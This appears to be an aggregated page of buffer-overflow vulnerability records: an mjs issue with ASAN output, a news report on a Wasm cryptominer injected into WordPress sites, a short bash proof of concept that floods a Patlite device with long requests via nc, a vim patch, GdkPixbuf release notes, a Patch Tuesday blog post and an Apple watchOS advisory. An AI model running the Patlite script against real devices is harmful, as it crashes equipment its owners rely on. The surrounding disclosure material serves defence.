An issue was discovered in mjs(mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow at 0x7fffe9049390.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

Clingto opened this issue

May 19, 2021

· 0 comments

**Comments**

System info:  
Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5)  
Compile Command:

    $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs
    

Run Command:

POC file:  
https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-module-stack-overflow

ASAN info:

ASAN:SIGSEGV
=================================================================
==10560\==ERROR: AddressSanitizer: stack-overflow on address 0x7fffe9049390 (pc 0x7fffe9049390 bp 0x00000042572b sp 0x7fffe9049348 T0)
    #0 0x7fffe904938f  (<unknown module>)

SUMMARY: AddressSanitizer: stack-overflow ??:0 ??
==10560\==ABORTING

1 participant

CVE-2021-33448: AddressSanitizer: stack-buffer-overflow in <unknown module> · Issue #170 · cesanta/mjs

An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow in json_parse_array() in mjs.c.

CVE-2021-33438: Minimum information for the vulnerability covered by 32 CVEs.

As many as 207 websites have been infected with malicious code designed to launch a cryptocurrency miner by leveraging WebAssembly (Wasm) on the browser.
Web security company Sucuri, which published details of the campaign, said it launched an investigation after one of its clients had their computer slowed down significantly every time upon navigating to their own WordPress portal.
This

As many as 207 websites have been infected with malicious code designed to launch a cryptocurrency miner by leveraging WebAssembly (Wasm) on the browser.

Web security company Sucuri, which published details of the campaign, said it launched an investigation after one of its clients had their computer slowed down significantly every time upon navigating to their own WordPress portal.

This uncovered a compromise of a theme file to inject malicious JavaScript code from a remote server -- hxxps://wm.bmwebm\[.\]org/auto.js -- that's loaded whenever the website's page is accessed.

"Once decoded, the contents of auto.js immediately reveal the functionality of a cryptominer which starts mining when a visitor lands on the compromised site," Sucuri malware researcher Cesar Anjos said.

What's more, the deobfuscated auto.js code makes use of WebAssembly to run low-level binary code directly on the browser.

WebAssembly, which is supported by all major browsers, is a binary instruction format that offers performance improvements over JavaScript, allowing applications written in languages like C, C++, and Rust to be compiled into a low-level assembly-like language that can be directly run on the browser.

"When used in a web browser, Wasm runs in its own sandboxed execution environment," Anjos said. "As it is already compiled into an assembly format, the browser can read and execute its operations at a speed JavaScript itself can't match."

The actor-controlled domain, wm.bmwebm\[.\]org, is said to have been registered in January 2021, implying the infrastructure continued to remain active for more than 1.5 years without attracting any attention.

On top of that, the domain also comes with the ability to automatically generate JavaScript files that masquerade as seemingly harmless files or legitimate services like that of Google Ads (e.g., adservicegoogle.js, wordpresscore.js, and facebook-sdk.js) to conceal its malicious behavior.

"This functionality also makes it possible for the bad actor to inject the scripts in multiple locations on the compromised website and still maintain the appearance that injections 'belong' within the environment," Anjos noted.

This is not the first time WebAssembly's ability to run high-performance applications on web pages has raised potential security red flags.

Setting aside the fact that Wasm's binary format makes detection and analysis by conventional antivirus engines more challenging, the technique could open the door to more sophisticated browser-based attacks such as e-skimming that can fly under the radar for extended periods of time.

Complicating matters further is the lack of integrity checks for Wasm modules, effectively making it impossible to determine if an application has been tampered with.

To help illustrate the security weaknesses of WebAssembly, a 2020 study by a group of academics from the University of Stuttgart and Bundeswehr University Munich unearthed security issues that could be used to write to arbitrary memory, overwrite sensitive data, and hijack control flow.

Subsequent research published in November 2021 based on a translation of 4,469 C programs with known buffer overflow vulnerabilities to Wasm found that "compiling an existing C program to WebAssembly without additional precautions may hamper its security."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Increasingly Using WebAssembly Coded Cryptominers to Evade Detection

Patlite versions 1.45 and below suffer from a buffer overflow vulnerability.

    # Exploit Title: CVE-2022-35911 - Patlite Overflow.# Date: 2022-07-07# Exploit Author: Samy Younsi - Necrum Security Labs# Vendor Homepage: https://www.patlite.co.jp# Software Link: https://www.patlite.co.jp/product/detail0000021462.html# Version: Versions 1.46 and bellow are affected# Tested on: CentOs & Ubuntu# CVE : CVE-2022-35911#!/bin/bashIP="192.168.1.101"PORT="80"for i in {0..1000}; do   echo "[$i]: ";   echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT; done > /dev/null 2>&1

Patlite 1.46 Buffer Overflow

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0060.

@@ -6770,34 +6770,55 @@ only\_one\_window(void)

}

  

/\*

\* Correct the cursor line number in other windows. Used after changing the

\* current buffer, and before applying autocommands.

\* When "do\_curwin" is TRUE, also check current window.

\* Implementation of check\_lnums() and check\_lnums\_nested().

\*/

void

check\_lnums(int do\_curwin)

static void

check\_lnums\_both(int do\_curwin, int nested)

{

win\_T \*wp;

tabpage\_T \*tp;

  

FOR\_ALL\_TAB\_WINDOWS(tp, wp)

if ((do\_curwin || wp != curwin) && wp->w\_buffer == curbuf)

{

// save the original cursor position and topline

wp->w\_save\_cursor.w\_cursor\_save = wp->w\_cursor;

wp->w\_save\_cursor.w\_topline\_save = wp->w\_topline;

if (!nested)

{

// save the original cursor position and topline

wp->w\_save\_cursor.w\_cursor\_save = wp->w\_cursor;

wp->w\_save\_cursor.w\_topline\_save = wp->w\_topline;

}

  

if (wp->w\_cursor.lnum > curbuf->b\_ml.ml\_line\_count)

wp->w\_cursor.lnum = curbuf->b\_ml.ml\_line\_count;

if (wp->w\_topline > curbuf->b\_ml.ml\_line\_count)

wp->w\_topline = curbuf->b\_ml.ml\_line\_count;

  

// save the corrected cursor position and topline

// save the (corrected) cursor position and topline

wp->w\_save\_cursor.w\_cursor\_corr = wp->w\_cursor;

wp->w\_save\_cursor.w\_topline\_corr = wp->w\_topline;

}

}

  

/\*

\* Correct the cursor line number in other windows. Used after changing the

\* current buffer, and before applying autocommands.

\* When "do\_curwin" is TRUE, also check current window.

\*/

void

check\_lnums(int do\_curwin)

{

check\_lnums\_both(do\_curwin, FALSE);

}

  

/\*

\* Like check\_lnums() but for when check\_lnums() was already called.

\*/

void

check\_lnums\_nested(int do\_curwin)

{

check\_lnums\_both(do\_curwin, TRUE);

}

  

/\*

\* Reset cursor and topline to its stored values from check\_lnums().

\* check\_lnums() must have been called first!

CVE-2022-2522: patch 9.0.0061: ml_get error with nested autocommand · vim/vim@5fa9f23

GNOME GdkPixbuf (aka GDK-PixBuf) before 2.42.8 allows a heap-based buffer overflow when compositing or clearing frames in GIF files, as demonstrated by io-gif-animation.c composite_frame. This overflow is controllable and could be abused for code execution, especially on 32-bit systems.

**Commit bca00032** authored Mar 18, 2022 by  👣

Browse files

**Release GdkPixbuf 2.42.8 (stable)**

Pipeline #378479 passed with stages

in 9 minutes and 43 seconds

*   Changes 2
*   Pipelines 1

2.42.8 (stable)

\===

\- Clear the pixbuf's memory buffer to avoid returning uninitialized memory \[#199\]

\- Turn GdkPixbufModule functions into typed callbacks \[!123\]

\- tiff: Use non-deprecated C99 integer types \[!124\]

\- gif: Check for overflow when compositing or clearing frames \[#190\]

\- Change png/jpeg/tiff build options from boolean to feature \[!118\]

\- jpeg: Do not rely on UB around setjmp/longjmp \[#143\]

\- Build fixes \[!114, #185, #182\]

\- Documentation fixes \[!120, !125\]

\- Translation updates

2.42.6 (stable)

\===

...

...

project('gdk-pixbuf', 'c',

version: '2.42.7',

version: '2.42.8',

license: 'LGPL-2.1-or-later',

default\_options: \[

'buildtype=debugoptimized',

...

...

CVE-2021-46829: Release GdkPixbuf 2.42.8 (stable) (bca00032) · Commits · GNOME / gdk-pixbuf · GitLab

Hello everyone! Microsoft has been acting weird lately. I mean the recent publication of a propaganda report about evil Russians and how Microsoft is involved in the conflict between countries. It wouldn’t be unusual for a US government agency, NSA or CIA to publish such a report. But when a global IT vendor, which, in […]

Hello everyone! Microsoft has been acting weird lately. I mean the recent publication of a propaganda report about evil Russians and how Microsoft is involved in the conflict between countries. It wouldn’t be unusual for a US government agency, NSA or CIA to publish such a report. But when a global IT vendor, which, in theory, should be more or less neutral, does this… This is a clear signal. It’s not about business anymore.

I’ll take a closer look at this report in the next episode of the Vulnerability Management news, but for now let’s take a look at Microsoft July Patch Tuesday. Yes, the vendor is behaving strangely, but Microsoft products need to be patched. Right? At least for now. And tracking vulnerabilities is always a good thing. 🙂

On July Patch Tuesday, July 12, 84 vulnerabilities were released. Between June and July Patch Tuesdays, 15 vulnerabilities were released. This gives us 99 vulnerabilities in the report.

    $ cat comments_links.txt 
    Qualys|July 2022 Patch Tuesday. Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/07/12/july-2022-patch-tuesday
    ZDI|The July 2022 Security Update Review|https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review
    
    $ python3.8 vulristics.py --report-type "ms_patch_tuesday_extended" --mspt-year 2022 --mspt-month "July" --mspt-comments-links-path "comments_links.txt"  --rewrite-flag "True"
    ...
    Creating Patch Tuesday profile...
    MS PT Year: 2022
    MS PT Month: July
    MS PT Date: 2022-07-12
    MS PT CVEs found: 84
    Ext MS PT Date from: 2022-06-15
    Ext MS PT Date to: 2022-07-11
    Ext MS PT CVEs found: 15
    ALL MS PT CVEs: 99
    ...

*   Urgent: 0
*   Critical: 1
*   High: 19
*   Medium: 78
*   Low: 1

Interestingly, in this Patch Tuesday, more than half of all vulnerabilities are EoP.

What can I say, prioritization in Vulristics works correctly. At the top of the July Patch Tuesday list is one critical and actively exploited **Elevation of Privilege** in Windows CSRSS (CVE-2022-22047). This vulnerability has been widely reported in the media.

Client Server Runtime Subsystem, or csrss.exe, is a component of the Windows NT family of operating systems that provides the user mode side of the Win32 subsystem and is included in Windows NT 3.1 and later. Because most of the Win32 subsystem operations have been moved to kernel mode drivers in Windows NT 4 and later, CSRSS is mainly responsible for Win32 console handling and GUI shutdown.

CSRSS runs as a user-mode system service. When a user-mode process calls a function involving console windows, process/thread creation, or side-by-side support, instead of issuing a system call, the Win32 libraries (kernel32.dll, user32.dll, gdi32.dll) send an inter-process call to the CSRSS process which does most of the actual work without compromising the kernel.

This Elevation of Privilege vulnerability in CSRSS allows an attacker to execute code as SYSTEM, provided they can execute other code on the target. Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft’s delay in blocking all Office macros by default.

Microsoft says this vulnerability has been exploited in the wild, though no further details have been shared. There is no public exploit yet. Two similar vulnerabilities in CSRSS (CVE-2022-22049 and CVE-2022-22026) were also fixed, likely as a result of Microsoft’s investigation into the in-the-wild exploitation of CVE-2022-22047.

**RPC RCE**

**Remote Code Execution** in Remote Procedure Call Runtime (CVE-2022-22038). Here Microsoft has a POC exploit. This July Patch Tuesday bug could allow a remote, unauthenticated attacker to exploit code on an affected system. While not specified in the bulletin, the presumption is that the code execution would occur at elevated privileges. Combine these attributes and you end up with a potentially wormable bug. Microsoft states the attack complexity is high. Additional actions by an attacker are required in order to prepare a target for successful exploitation and an attacker would need to make “repeated exploitation attempts” to take advantage of this bug, but unless you are actively blocking RPC activity, you may not see these attempts.

**Microsoft Edge Memory Corruption**

Between June and July Patch Tuesday, **Memory Corruption** in Microsoft Edge (CVE-2022-2294) was released. Heap buffer overflow in WebRTC, to be precise. WebRTC (Web Real-Time Communication) is a free and open-source project providing web browsers and mobile applications with real-time communication (RTC) via application programming interfaces (APIs). It allows audio and video communication to work inside web pages by allowing direct peer-to-peer communication, eliminating the need to install plugins or download native apps. So, the vulnerability is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. Google is aware that an exploit for this vulnerability exists in the wild. If you’re using Microsoft Edge (Chromium-based), make sure it gets updated as soon as possible.

**Azure Site Recovery RCEs and EOPs**

There are also a lot of vulnerabilities in Azure Site Recovery in July Patch Tuesday. Both EoPs and RCEs, and quite a few with non-public exploits of the POC maturity level. According to the description “Site Recovery is a native disaster recovery as a service (DRaaS)”, it would seem that this should be patched by Microsoft themselves. But in fact, there is a Microsoft Azure Site Recovery suite installed on the hosts, and at least some of the vulnerabilities were found in it.

Let’s see, for example, **Elevation of Privilege** in Azure Site Recovery (CVE-2022-33675). The vulnerability was discovered and reported to Microsoft by Tenable researcher Jimi Sebree. The Microsoft Azure Site Recovery suite contains a DLL hijacking flaw that allows for privilege escalation from any low privileged user to SYSTEM. 

Incorrect permissions on the service’s executable directory (E:\\Program Files (x86)\\Microsoft Azure Site Recovery\\home\\svsystems\\transport\\) allow new files to be created by any user. The service launched from this directory runs automatically and with SYSTEM privileges and attempts to load several DLLs from this directory. This allows for a DLL hijacking/planting attack via several libraries that are attempted to be loaded from this location when the service is launched. Existing deployments should ensure that the Microsoft-supplied patches have been appropriately applied.

The full Vulristics report is available here: ms\_patch\_tuesday\_july2022\_report

Hi! My name is Alexander and I am an Information Security Automation specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

Microsoft Patch Tuesday July 2022: propaganda report, CSRSS EoP, RPC RCE, Edge, Azure Site Recovery

Heap buffer overflow in WebUI in Google Chrome prior to 100.0.4896.60 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially exploit heap corruption via specific input into DevTools.

**Chrome Releases**

Release updates from the Chrome team

CVE-2022-1143: Stable Channel Update for Desktop

CVE-2022-1142

Apple Security Advisory 2022-07-20-6 - watchOS 8.7 addresses buffer overflow, bypass, code execution, out of bounds read, out of bounds write, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-07-20-6 watchOS 8.7

watchOS 8.7 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213340.

APFS  
Available for: Apple Watch Series 3 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32832: Tommy Muir (@Muirey03)

AppleAVD  
Available for: Apple Watch Series 3 and later  
Impact: A remote user may be able to cause kernel code execution  
Description: A buffer overflow issue was addressed with improved  
bounds checking.  
CVE-2022-32788: Natalie Silvanovich of Google Project Zero

AppleAVD  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32824: Antonio Zekic (@antoniozekic) and John Aakerblom  
(@jaakerblom)

AppleMobileFileIntegrity  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to gain root privileges  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 4  
and later  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with improved checks.  
CVE-2022-32845: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 4  
and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-32840: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 4  
and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32810: Mohamed Ghannam (@_simo36)

Audio  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-32820: an anonymous researcher

Audio  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32825: John Aakerblom (@jaakerblom)

CoreText  
Available for: Apple Watch Series 3 and later  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32839: STAR Labs (@starlabs_sg)

File System Events  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32819: Joshua Mason of Mandiant

GPU Drivers  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: Multiple out-of-bounds write issues were addressed with  
improved bounds checking.  
CVE-2022-32793: an anonymous researcher

GPU Drivers  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-32821: John Aakerblom (@jaakerblom)

ICU  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

ImageIO  
Available for: Apple Watch Series 3 and later  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32841: hjy79425575

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32813: Xinru Chi of Pangu Lab  
CVE-2022-32815: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-32817: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An app with arbitrary kernel read and write capability may be  
able to bypass Pointer Authentication  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32844: Sreejith Krishnan R (@skr0x1c0)

Liblouis  
Available for: Apple Watch Series 3 and later  
Impact: An app may cause unexpected app termination or arbitrary code  
execution  
Description: This issue was addressed with improved checks.  
CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China  
(nipc.org.cn)

libxml2  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to leak sensitive user information  
Description: A memory initialization issue was addressed with  
improved memory handling.  
CVE-2022-32823

Multi-Touch  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A type confusion issue was addressed with improved  
checks.  
CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

Multi-Touch  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A type confusion issue was addressed with improved state  
handling.  
CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

Software Update  
Available for: Apple Watch Series 3 and later  
Impact: A user in a privileged network position can track a user’s  
activity  
Description: This issue was addressed by using HTTPS when sending  
information over the network.  
CVE-2022-32857: Jeffrey Paul (sneak.berlin)

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 239316  
CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@_manfp) working with Trend Micro Zero  
Day Initiative

Wi-Fi  
Available for: Apple Watch Series 3 and later  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: This issue was addressed with improved checks.  
CVE-2022-32847: Wang Yu of Cyberserval

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła  
(@_r3ggi) of SecuRing for their assistance.

configd  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła  
(@_r3ggi) of SecuRing for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYeuUACgkQeC9qKD1p  
rhjSsg//XnukSPtKHk58IOSkcWaTk0WdrYv2+dGbdgkcPBgO2ehNQqk1xI3LDHLN  
b6A5MMaoR4ityTEC+i4XFWxVJNfzXFa1SHMiht1uJDtaNCc2F+VIP+EZJx2KYe7H  
O8F0g9lF33hQE3xDjrwtPe+7wYjfzgDX8iCbsfaNDPAWBq0BfNA8/4bv5GzPaPC4  
qcP+W9IRb11yAzlnCEgJNhMB0SLwtzpcUYLKcJbPdilABeYe08CLIIVAw2vKI1Kk  
J7sk/ZiGKnB1ZHa+fl17ahApKkLePnFtHR9rMseEpyRbPa7EvomZxUQoLvbaDf+Q  
gRqtysAw8oxfhetorvDFwAem3eCRdgJ/T/0U6jC+4dfHzVnGxV27K/PgF3GWRDU5  
trPVZ0cu8qdzgNAwSuRHTxTg923FN7cR14NL66TkGZ1d/VKfn1l0h1wctoPOhHPR  
zWJi5P8WbprG1XVWNx+aJYW09VIMsujJrrGQSn78o6gXOR2salEDiCs2JixKZnqK  
CV4+uGQIiE8bD0oA1B1uFQiPx3XtgOY92QQl8Jnn/7Xa6QQ0hq/3NmDN66RzO78S  
I4pH4Vt/L0LNoArGMCrO4URpLiQx5Au0niH5+jbvHyWr1Bm3Y+dMRP1yds3aLQ0Q  
16FIrWStzY+cnmOXQKczTIiaJYuSMjCOQicLuWx/q2ghfLCJ16E=  
=6Uj+  
-----END PGP SIGNATURE-----

Tag

#buffer_overflow